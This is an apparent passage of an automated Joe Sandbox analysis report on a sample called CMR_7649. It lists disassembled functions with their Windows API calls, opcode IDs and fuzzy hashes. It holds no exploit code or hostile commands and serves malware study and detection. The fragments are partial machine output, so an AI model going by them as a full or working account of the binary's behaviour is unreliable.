                                                • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                APIs
                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                • String ID:
                                                • API String ID: 3321077145-0
                                                • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                • __isleadbyte_l.LIBCMT ref: 004208A6
                                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                APIs
                                                • GetParent.USER32(?), ref: 004503C8
                                                • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Proc$Parent
                                                • String ID:
                                                • API String ID: 2351499541-0
                                                • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                • TranslateMessage.USER32(?), ref: 00442B01
                                                • DispatchMessageW.USER32(?), ref: 00442B0B
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Message$Peek$DispatchTranslate
                                                • String ID:
                                                • API String ID: 1795658109-0
                                                • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                APIs
                                                • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                • GetCaretPos.USER32(?), ref: 004743B2
                                                • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                • GetForegroundWindow.USER32 ref: 004743EE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                • String ID:
                                                • API String ID: 2759813231-0
                                                • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                APIs
                                                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                • _wcslen.LIBCMT ref: 00449519
                                                • _wcslen.LIBCMT ref: 00449526
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend_wcslen$_wcspbrk
                                                • String ID:
                                                • API String ID: 2886238975-0
                                                • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __setmode$DebugOutputString_fprintf
                                                • String ID:
                                                • API String ID: 1792727568-0
                                                • Opcode ID: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                                                • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                • Opcode Fuzzy Hash: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                                                • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                APIs
                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$Long$AttributesLayered
                                                • String ID:
                                                • API String ID: 2169480361-0
                                                • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                APIs
                                                  • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                  • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                  • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                • String ID: cdecl
                                                • API String ID: 3850814276-3896280584
                                                • Opcode ID: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                                                • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                • Opcode Fuzzy Hash: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                                                • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                APIs
                                                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                • _memmove.LIBCMT ref: 0046D475
                                                • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                • String ID:
                                                • API String ID: 2502553879-0
                                                • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                APIs
                                                • SendMessageW.USER32 ref: 00448C69
                                                • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow
                                                • String ID:
                                                • API String ID: 312131281-0
                                                • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                APIs
                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorLastacceptselect
                                                • String ID:
                                                • API String ID: 385091864-0
                                                • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                APIs
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                • GetStockObject.GDI32(00000011), ref: 00430258
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$CreateMessageObjectSendShowStock
                                                • String ID:
                                                • API String ID: 1358664141-0
                                                • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                • String ID:
                                                • API String ID: 2880819207-0
                                                • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ClientRectScreen$InvalidateWindow
                                                • String ID:
                                                • API String ID: 357397906-0
                                                • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                APIs
                                                • __wsplitpath.LIBCMT ref: 0043392E
                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                • __wsplitpath.LIBCMT ref: 00433950
                                                • __wcsicoll.LIBCMT ref: 00433974
                                                • __wcsicoll.LIBCMT ref: 0043398A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                • String ID:
                                                • API String ID: 1187119602-0
                                                • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                • String ID:
                                                • API String ID: 1597257046-0
                                                • Opcode ID: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                                                • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                • Opcode Fuzzy Hash: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                                                • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                • __malloc_crt.LIBCMT ref: 0041F5B6
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: EnvironmentStrings$Free__malloc_crt
                                                • String ID:
                                                • API String ID: 237123855-0
                                                • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: DeleteDestroyObject$IconWindow
                                                • String ID:
                                                • API String ID: 3349847261-0
                                                • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
